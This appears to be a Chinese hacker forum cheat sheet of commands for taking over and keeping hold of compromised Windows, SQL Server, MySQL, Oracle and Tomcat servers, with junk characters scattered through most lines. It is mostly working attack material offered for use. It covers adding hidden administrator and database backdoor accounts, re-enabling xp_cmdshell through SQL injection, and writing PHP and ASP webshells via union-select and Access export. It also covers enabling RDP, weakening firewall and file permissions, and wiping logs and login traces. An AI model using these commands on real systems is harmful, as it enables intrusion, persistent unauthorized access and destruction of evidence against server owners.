6 c- x' R% @, Y/ ~& X. E' a1.net user administrator /passwordreq:no
' r" }/ u, j" _' m, {这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
`3 G4 ^+ F Q% v" ~2.比较巧妙的建克隆号的步骤
# E) f. ]: b4 Z* l9 g先建一个user的用户
% S% F! T9 I9 o- l5 H' o8 n1 N然后导出注册表。然后在计算机管理里删掉
, v8 o o/ G* F2 o0 Y在导入,在添加为管理员组 c4 G% B# z! }9 C6 z: g! C
3.查radmin密码% D# ~4 D/ O3 _* x2 w+ a/ ?
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg' O+ i; E) [. `
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]. M, i0 [1 I. G! y2 n
建立一个"services.exe"的项* z4 K7 U6 C- @7 C. j+ ~; V2 q
再在其下面建立(字符串值)
) X2 ?7 c1 }- S6 P; ]$ I键值为mu ma的全路径7 C G }- y' f6 c( {6 u
5.runas /user:guest cmd
/ i. T) G/ n3 E2 u测试用户权限!" g$ d. V1 ^- G' [5 J3 i
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
1 ]3 R" C" z9 \# g/ e8 M7.入侵后漏洞修补、痕迹清理,后门置放:3 s' h R6 u& D2 @0 D9 ^' e6 I( t
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门 S K: j$ n7 z$ F& J# }; R- A
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
- D. t) ^% g+ p. s7 i; {. X3 ]( [; c$ j$ Y% ~
for example
8 C' m) e% H7 [9 j0 n2 U Q. m7 c. v
4 q' z9 d! `% L* B- q. fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'' O7 n% r* R4 V2 _5 x
6 D7 y/ h d0 h5 t9 [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add' _$ d p, ^$ W) x; }" @
7 l' q( u' r# w8 `8 G6 Z9 g
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了, } M8 Q. z9 n% K$ r; H+ V) F2 Q: V
如果要启用的话就必须把他加到高级用户模式
$ s3 [. P. {+ p' o" d( e" @' Y可以直接在注入点那里直接注入
: w, [3 j, [1 ?. v4 F; e7 iid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! Q) c; ]7 x3 n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
' G4 G) ?0 D! E' l6 n或者
# c. q* |4 E; H" y( u3 w' a: T4 Lsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 |5 X: N4 O, k+ `8 K( T9 c' ?5 ?
来恢复cmdshell。* d6 x; N' R! x) A0 H! U
# u1 ^, x8 `/ l/ y1 Q7 @分析器
, C. h4 N9 B% S/ U, h% }6 j% fEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
* N _+ t4 E' ]) C# X然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")" r6 S$ `. Y6 u% ~* i9 V( |* l
10.xp_cmdshell新的恢复办法
& g# X" n* v0 sxp_cmdshell新的恢复办法$ c; p [3 H7 P+ ~
扩展储存过程被删除以后可以有很简单的办法恢复:) s' _' d8 |4 J) @6 [; l
删除
: m8 c- z0 q8 x" d* H! j/ R: M# [8 }drop procedure sp_addextendedproc
0 \; G/ a9 o# jdrop procedure sp_oacreate
, Y7 }0 x/ \. M0 mexec sp_dropextendedproc 'xp_cmdshell'7 X% J! o7 U4 S7 H I2 n3 I
- a) u! D$ j& u
恢复% A0 @0 n& e6 @. J$ u3 M
dbcc addextendedproc ("sp_oacreate","odsole70.dll")$ n! M4 F' }$ K' K* ` @
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")* ]) G$ K1 ~+ ?4 {6 o2 c; f! h
* C) J& S/ f3 s% p' g' ?+ t, k这样可以直接恢复,不用去管sp_addextendedproc是不是存在
& V! r0 `- [; ?* @7 U7 U9 D0 o
' @1 l; E& s& t0 `$ s------------------------------ c7 X8 `9 m% n' Y/ v3 j
5 e9 ]2 C5 f5 ~" n
删除扩展存储过过程xp_cmdshell的语句:4 ^ ?# t# s J& t% Y
exec sp_dropextendedproc 'xp_cmdshell'
- n' ?( V9 k+ c$ w( g: j# O& E$ A+ ^# B+ g' l) a! @
恢复cmdshell的sql语句4 b# T1 D8 r2 U1 t
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'& B( N6 ~( a1 h% }% i3 ?
4 [4 l4 Y3 u6 @; A1 d9 ~2 T8 u( P: V4 \+ [* r) S: U
开启cmdshell的sql语句$ H0 { w8 d# k$ v, Q# @1 S
7 x# o! Y# n$ i1 P$ c# Vexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'; m O q1 [. X
6 }; u' k* O% B8 g5 `) o( n
判断存储扩展是否存在& Y/ b4 l+ ^ u( c( B
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; b% R0 S& u4 M8 ]6 {
返回结果为1就ok
A2 m m+ W& S1 d1 B' s7 y; j/ U. b3 ]
恢复xp_cmdshell
1 f0 b7 v* g' ^$ ?& Mexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
4 a; Z' j- s8 L; F" ^& K: H `返回结果为1就ok+ H+ A1 l5 e+ j* L
/ M( s( B% L) V0 F: j& Z否则上传xplog7.0.dll7 r% j6 z1 B+ J' D( a7 H6 _
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'( N; R) V) I6 s( e' I9 a+ N
2 F9 P8 t. P5 i; n( m, T3 M# _
堵上cmdshell的sql语句
: p6 F% u. N$ |+ z: esp_dropextendedproc "xp_cmdshel
: h0 w( @( ]2 B! T; N5 x* Q7 M7 f2 x-------------------------" @( ] m6 E& s N0 u- H5 }4 X
清除3389的登录记录用一条系统自带的命令:. b0 |- R+ I! x# `3 C8 X: J4 P+ G
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
' O" w( |: Y# z9 m7 ^% R5 e
x& `" \% d) h* K# N然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
# Y4 }; j" B# p4 d6 X在 mysql里查看当前用户的权限* p4 @0 t F8 D# E0 G
show grants for
# ~% {* J: @1 Y; n" }9 m' c C, m: }5 E# I/ \, }- x& F
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
. q: r5 J5 h: l6 S$ K% v$ E& b3 {' A! c' h4 e' F( A: g
. _' y6 `( [& F" c/ e( [# ~2 [( o3 iCreate USER 'itpro'@'%' IDENTIFIED BY '123';+ `& {0 c; Z. T+ h G. ^! f4 I
- ?! a' c; v9 E- g/ ]6 pGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION, t2 |; J) {4 J) n
+ }# {, A+ p5 V: I/ R `+ F) g8 IMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 05 }+ ?; i9 f& A8 Q0 c
( A3 j. p; [% e( }. u# i
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;: C3 t: L! ]# Y- U5 H9 f4 n* t7 ]
" ?* m& n }( s+ s9 r/ |6 _! r
搞完事记得删除脚印哟。" \7 g/ m& L- n W5 T/ J% y+ }
$ [0 V9 I% Y+ w' R! mDrop USER 'itpro'@'%';5 [8 ~) q H# Q5 }! y9 J
5 G/ E8 Q5 }3 q6 x# v" R, \
Drop DATABASE IF EXISTS `itpro` ;. W7 h( U3 U* D6 W+ ~9 Z- W
" D' n0 ]( k& C* P# o. D当前用户获取system权限7 r ?$ T. j S5 v1 h B) d
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact/ |$ U6 t/ j, i. [: u; ^+ T
sc start SuperCMD
( v8 X( |( j# x# q0 n2 B J程序代码5 s4 V( K" }; B! g7 d
<SCRIPT LANGUAGE="VBScript">: E+ K9 {) S l8 n, @/ O: O6 ?7 ^
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
1 M- P5 r/ p" A- Xos="WinNT://"&wsnetwork.ComputerName
" U( _% z, x: c& DSet ob=GetObject(os)# K; }* z- @( M3 G( ^* e U
Set oe=GetObject(os&"/Administrators,group")
L/ h6 |0 q/ X; [8 r- DSet od=ob.Create("user","nosec")( |% y. p9 D5 }
od.SetPassword "123456abc!@#"
" v: J! F t* v2 i. w# X* Eod.SetInfo* n1 [6 A; r% F* r+ E0 F9 G
Set of=GetObject(os&"/nosec",user); Q& J+ J6 t6 J$ }+ k
oe.add os&"/nosec"
5 q& A9 o8 w. h</Script># E8 H" [3 O: T
<script language=javascript>window.close();</script>+ b. t! x7 q5 e+ h- W
4 k1 U* y+ I1 |, F' {$ X: [5 h2 ], X, e
' | a9 ~7 K5 |3 G
, F9 y- P& L7 K0 Q- |0 J
# S. A2 h+ K4 W
突破验证码限制入后台拿shell' b4 o, }$ X4 B6 ]
程序代码% v, M* _& D1 j- x, s( ]
REGEDIT4 * N3 ?2 z& @3 ?0 s8 L- D$ h
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 2 D: ?3 o& s* i4 O+ E) `' I2 U
"BlockXBM"=dword:00000000
' h' I; w7 K3 z
; L: e5 o4 M. s0 ?保存为code.reg,导入注册表,重器IE
5 n4 X; a) |1 ?就可以了
C; _3 r" E, j, yunion写马
& q. I g9 ?' D1 s' `$ I程序代码1 Q- D( i5 k) ?
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) f# |* g |7 L7 `1 o3 l/ h
2 f \# I# \& b应用在dedecms注射漏洞上,无后台写马
1 P) ]/ Z( A% g* ~! _% Cdedecms后台,无文件管理器,没有outfile权限的时候
9 R2 k. {2 u+ R在插件管理-病毒扫描里
" w' p3 M) {# c写一句话进include/config_hand.php里9 h. l1 T6 m8 q( i& Z- B
程序代码. ^+ F$ f& a& T7 A7 P" @+ o
>';?><?php @eval($_POST[cmd]);?>
+ z$ G- F$ `' R4 q9 h' j
6 G3 X+ J! k6 [( u. l; I7 C9 |: O: P) @2 c: V
如上格式
$ s9 Z1 D: h* q f4 _ Z: I; F
/ T3 ^9 G- z( \4 K1 {* xoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
8 v D4 f. r/ L' | N( [$ K5 Y程序代码
4 t3 e1 D3 K% a- sselect username,password from dba_users;
( h7 I0 o7 z) X
2 V2 C* e- J# R* s
5 F+ q: _/ |$ b) I# f# zmysql远程连接用户% r0 ]. m' x" \: A) Q9 p# K1 M
程序代码2 L- v) I: o! p. C
2 l& B5 K9 W. u0 Q; d' ]! _5 cCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
3 \6 ?9 v3 g6 ]& q( d+ a! wGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION8 x8 t& I# v' k. N, j) M% O
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
6 q6 h* i$ U4 K: b% ^! ZMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# N! `( K: {: V+ |1 Y# D m
; S5 m1 ~. L6 C9 c( v. w8 h! q$ t4 u% C
- Z: c6 c* ?2 D3 E. A
! g: l$ X9 I! g4 j: O
G/ T! h# y0 _1 _echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 08 H+ l# m+ n* W' ^7 m2 r8 c) y9 U, y
( Y+ J [" b% T, s- V# X+ V1.查询终端端口( q" L( X- E8 W3 G0 ^( v+ x
) q+ Z6 X- j) J" a$ l+ w
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber" J/ N D N+ o" t; {8 N, }" t
: Y9 |0 f: b5 j. S. }: Z, I$ s通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"8 {. x7 L: t* v9 C/ {: E; g. K5 a
type tsp.reg, o, l# d7 ?9 z; R0 T m
7 U" j& R* A' S) X8 I, `2 {; f2.开启XP&2003终端服务9 N6 c7 e' | d2 M5 Q/ y; e. f- w
. u+ G1 z! B6 O# f- K
" x) O8 L7 a: M/ Q: {$ w" h/ k( q$ J* dREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" Q' h/ S3 O! {) u
+ ^, B' @6 e, T4 |7 `
; [' {1 `8 q, Z1 c5 ^REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f+ w7 K" E) g1 C4 f8 a; j# b
. A0 F- A' y/ V9 G+ q
3.更改终端端口为20008(0x4E28)
, V6 u2 N' P6 q. C1 [3 j3 t6 ?1 ~8 v. j4 h+ q% q
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 o" d+ ~1 c) X
* p1 ?0 @5 {% e0 p* c" _/ mREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f% E% T, w5 L8 T# O- D& X5 K0 a
- J( |6 w' D3 w* ~# I! W9 z
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制$ P) q' {% P$ H
3 k& `' |( b( ]3 U8 j5 p' ^" XREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f* U# {1 U) U: ?2 B6 z3 m" l
+ r: p1 ~ l+ O6 w" f; \0 ]
9 E' l* B0 a* f" Z9 l0 d7 `# l$ K5.开启Win2000的终端,端口为3389(需重启)( F- Q7 M! b) z+ j1 _! [2 z
8 W4 k; C2 M& i! j4 N, jecho Windows Registry Editor Version 5.00 >2000.reg & G' `# p2 a l- c! C% n
echo. >>2000.reg% i4 z: y6 ^& z9 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
$ a* B5 Z6 Z- d& o% F5 Recho "Enabled"="0" >>2000.reg
) N, H I3 \" s# f7 \- yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
9 O5 I7 s( b! H% g/ y, becho "ShutdownWithoutLogon"="0" >>2000.reg
' p) N1 u Q5 T7 Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
9 V9 f9 m& r$ U/ H% ~echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ! d. V4 A4 f9 S' q/ f- a9 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg B+ ^7 d* ^: M# Z$ K$ Z
echo "TSEnabled"=dword:00000001 >>2000.reg
( {' p! |; X& |( x3 decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
, n+ @. F# N: q% C, E3 T) w' Qecho "Start"=dword:00000002 >>2000.reg 2 Y- J- `# p9 A: l2 g! k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 6 I( c3 }3 P! k1 E( m
echo "Start"=dword:00000002 >>2000.reg
: h. R6 v% l- k K2 X2 ]5 hecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg % K' H7 d* T& _9 x* m3 H/ z
echo "Hotkey"="1" >>2000.reg `6 r/ z% u8 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
/ N: f" y0 \0 r6 i' |/ \echo "ortNumber"=dword:00000D3D >>2000.reg 5 @) `! X; `- r0 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg e- f% V& B% J* P
echo "ortNumber"=dword:00000D3D >>2000.reg
6 k+ @) V3 C8 Y x! M9 J, Z" y7 O
* V: A# R& w" r8 s# D) g6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启) Z/ \4 r% T' o& O+ M: b
, e) k5 ]( c8 \9 y@ECHO OFF & cd/d %temp% & echo [version] > restart.inf8 [, N" B4 t1 D) @: a: K
(set inf=InstallHinfSection DefaultInstall)& e6 O( D$ A9 f' y W
echo signature=$chicago$ >> restart.inf
% a5 ~4 ^5 Y; ?+ w% w, `" Q) G# Fecho [defaultinstall] >> restart.inf
) v" _* q/ ]1 y7 y1 G& U; r |$ A+ qrundll32 setupapi,%inf% 1 %temp%\restart.inf
& W( M! y' Q& `1 h" R1 f
# F% a' B2 k/ |" C3 [/ ^4 G# D9 u; d2 X) q0 N8 @ u7 _) _0 M+ L
7.禁用TCP/IP端口筛选 (需重启)8 H7 J. e) X" n, T/ J& ?* w: b; F
4 @# i7 i! k' {' @4 SREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f) R3 S: L' V4 H+ C4 ^
7 S8 J5 W/ s3 M5 o$ m
8.终端超出最大连接数时可用下面的命令来连接
- |) n: P5 f7 e5 ^. s, H! x' e8 C: i0 H( Q
mstsc /v:ip:3389 /console2 r7 z9 A$ ~" J; F: `( [! M
1 w+ A4 U: d8 U) i& Z" x; n
9.调整NTFS分区权限
/ P. r/ c- d: Y7 A: V& |6 l N* Z8 V- K
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利), K# t4 Q: s( F6 O) `3 Z E8 P
* I9 k% W9 S! M2 Z# H, `1 j7 R% J7 gcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
$ z5 A0 O4 s7 r9 o( F8 ~/ N P' l' F- P! u$ K8 Q0 _
------------------------------------------------------1 d+ j8 y+ m5 U8 k4 G
3389.vbs
' a* J) {8 |, l. ]& V- jOn Error Resume Next; \% Y3 B6 U2 r: d
const HKEY_LOCAL_MACHINE = &H800000027 r# P$ E( @. k2 o
strComputer = "."% O+ [, y' S8 @! ` ]8 ]
Set StdOut = WScript.StdOut
# ?5 |; r- t4 n/ @Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
! S% Q; B, e& N1 [; J; nstrComputer & "\root\default:StdRegProv")
. [' v- z* q& ]* v g0 X4 q: GstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
5 G- m/ v2 |% c. a" Ioreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
9 S6 V/ C9 n0 c5 N7 ^" cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"# a$ _6 Y. Q2 D( d$ r& M; B1 n
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath; {& D" [0 D; ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
+ \+ `& {! w) j" p7 BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
- m; S. }7 ]1 }strValueName = "fDenyTSConnections"( A; ]/ R; ~4 J2 D7 E6 \; P
dwValue = 0# O1 g% a/ D' m9 H$ I* t' k
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 M3 c$ A; L7 M. C: _1 mstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"' C2 q# k( D+ ]; A6 P9 g; }% P& A) f
strValueName = "ortNumber"
4 J$ D- c ]) l6 u. ?dwValue = 3389( K% V) B- y* m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 E* I" S o# [! h% H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
; g. V" O/ m* jstrValueName = "ortNumber"" u! k; z$ z& u) K( C: R3 y
dwValue = 3389) w8 T" e D i* Y$ D
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
0 H, x) Q7 J# j) v9 [# M4 }Set R = CreateObject("WScript.Shell") ) N% u; q! {( L% X- G9 E. X8 S
R.run("Shutdown.exe -f -r -t 0") # u% u1 E7 y1 b4 ]# i5 M! x( s
+ p1 Z5 A, i9 e# S/ q/ p: x删除awgina.dll的注册表键值
" Z5 n; A2 ]& X2 e程序代码
" V- m- i0 L+ o3 z( P# }$ X6 R [; K* U0 D; R0 [6 V5 a0 \
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f+ u6 S- L* o8 S* ?
4 Z$ N; H+ a2 x0 u3 Q6 T" y
+ H9 c* Y% {1 d5 L7 d
) W0 B9 X% ~! S" z: _
/ E8 O' B! d. r! p5 i, i
程序代码4 e5 E0 n! X9 P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
{2 G0 B9 q6 V/ v q, _" R( o
设置为1,关闭LM Hash
/ u& a/ x" U( v9 h
) s: [9 v7 R5 ]% o数据库安全:入侵Oracle数据库常用操作命令, J ~ Q7 P/ ~0 [6 m
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。. T" x$ ~3 {$ M* [) I
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。& r9 n; T3 [4 t; v
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
2 C i9 U# d, y) o# {3、SQL>connect / as sysdba ;(as sysoper)或# i3 w1 C$ \+ T. ]4 E8 A& X
connect internal/oracle AS SYSDBA ;(scott/tiger)
: k' @+ G7 k7 V3 P! [conn sys/change_on_install as sysdba;
8 @) X* v, `4 S8 N4、SQL>startup; 启动数据库实例% r( b4 b7 v3 T! z9 W
5、查看当前的所有数据库: select * from v$database;& v8 ^# h. e4 v
select name from v$database;6 M- R) E% r, A* T2 c
6、desc v$databases; 查看数据库结构字段
! a* {! n- I1 q5 L4 D; v8 h7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:$ R9 t$ d0 [/ B9 S/ K8 V) f# A, U
SQL>select * from V_$PWFILE_USERS;
, R* a+ F% M. x4 X( RShow user;查看当前数据库连接用户
* P! e* Y7 h+ C- L; e- B8、进入test数据库:database test;
3 k* r) x5 w6 h9、查看所有的数据库实例:select * from v$instance;% w* a7 o0 a- l0 E/ I6 M" v- a7 y. x! @
如:ora9i
9 Y3 ^% o5 `1 P9 @6 f; o$ W10、查看当前库的所有数据表:
' \3 v/ p' L) n9 F# rSQL> select TABLE_NAME from all_tables;
% j j( S8 P$ \3 B$ U' L8 q+ }select * from all_tables;
3 q# H9 \$ ?: A. N9 b$ CSQL> select table_name from all_tables where table_name like '%u%';
5 }) i: y, X! a. J+ H8 E5 ITABLE_NAME
5 N( x4 e- Q( R+ y------------------------------. B- B/ @) R7 g/ G1 |3 p+ r5 |
_default_auditing_options_
! x8 J. O% G. {* ~/ D11、查看表结构:desc all_tables;
9 F. d( F3 a8 z5 k$ P12、显示CQI.T_BBS_XUSER的所有字段结构:+ n8 z) e6 C; K0 P7 U7 W4 ?
desc CQI.T_BBS_XUSER;
; C9 n0 }# I3 G$ q13、获得CQI.T_BBS_XUSER表中的记录:! X2 y; e& I1 g- E) N$ w8 Q
select * from CQI.T_BBS_XUSER;
% U$ o' ^9 I+ H14、增加数据库用户:(test11/test)3 d5 k8 `8 B" f
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
1 {* a4 L6 L7 H; W3 k9 X7 {15、用户授权:3 q* l) @' D2 e9 x# \/ g
grant connect,resource,dba to test11;
. [; V2 I: u( \0 p. Bgrant sysdba to test11;" k/ F* x8 [- I% o$ l' h! ^/ K2 K
commit;% v1 c& V3 W2 S# B
16、更改数据库用户的密码:(将sys与system的密码改为test.)
: W- e: y" K& {2 R. salter user sys indentified by test;3 X& |+ E" h2 |/ R4 ~3 |+ m
alter user system indentified by test;
( H/ R, {6 Q/ c0 y% ^) h9 u! ~( U
2 b. m( ^$ D; R3 J+ {/ japplicationContext-util.xml
; b3 i8 E" E) Y+ ^5 P% }applicationContext.xml
( Z) }: L3 S1 d& s b+ p- wstruts-config.xml8 p# A$ P3 s& y+ ]* @. @
web.xml, L! u, e6 C5 H+ E1 H
server.xml2 F+ C4 t* N# [+ F1 Y
tomcat-users.xml
* k' c2 r; f: L8 u3 h5 _" W; khibernate.cfg.xml
5 J2 @4 A/ N- t2 \0 b! ]# Mdatabase_pool_config.xml
* O7 t1 t- c) y* B* i9 _2 `4 a: S3 S+ |* [9 s
9 \$ B8 w% W: `" z6 D\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
0 B" q8 B3 ^; e6 `; G7 K\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
2 u1 F j5 h' o; b1 w% H. o! ]\WEB-INF\struts-config.xml 文件目录结构$ d' \( ~+ ]" l, @2 Q; P
/ P& m- T3 P6 d+ Q* q6 e
spring.properties 里边包含hibernate.cfg.xml的名称) a, \$ t9 d* i- S' ?
9 c% o) u3 B: f" ^& ?
( S9 x6 z O" J$ jC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml- `: P) O2 U) Y+ y
) N, `5 `" T5 q; }. ?) o如果都找不到 那就看看class文件吧。。2 n# F: o/ B7 k$ M% _% o. e
7 e' n7 M0 K. Q% Q
测试1:
% m% t/ q) w _1 O- jSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
6 E7 k4 f. h. h
1 p8 c9 Q' w. W测试2:
* Z" L$ ^* n1 ]7 O# U+ e5 `3 g) S! `# [ k3 H- l- d3 c
create table dirs(paths varchar(100),paths1 varchar(100), id int) D* _0 s2 @' v) y1 q1 o
3 n/ W: x" I* S& {delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
$ M2 ~# |' }- u5 ?" ^% j ^6 {1 n5 v
) ]$ H' V e' oSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1/ }9 B) {$ m$ q+ {7 h+ M: W6 y4 F
$ X: S; g4 @7 ~; h8 T2 d5 b. e5 [; l$ D查看虚拟机中的共享文件:4 ^9 u: D ~8 L* |) H, n
在虚拟机中的cmd中执行% y- J ^( C! D
\\.host\Shared Folders2 s* n7 V# I! B, v6 ]; `9 ^
; U' Q. D! M% j: K: `
cmdshell下找终端的技巧' u6 g8 I |# Q& m7 t5 W/ w
找终端:
+ s8 A& V6 u [8 ^第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
0 e8 N- h1 y1 d4 Y& H$ f 而终端所对应的服务名为:TermService
6 A# C/ C4 y) i) g. t" ?第二步:用netstat -ano命令,列出所有端口对应的PID值!
3 a/ f% g! H. g6 e 找到PID值所对应的端口
/ A& o+ L, o/ n( M+ X
^$ u1 A$ I8 W S! w/ ~! s0 F查询sql server 2005中的密码hash
' x. p% z) n9 T9 eSELECT password_hash FROM sys.sql_logins where name='sa'
, r; h) [- a. Y8 R; ^8 a# {, G+ }SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a# ]4 A$ V0 k2 v7 M+ T
access中导出shell: d2 A! X$ U8 ?0 w! a
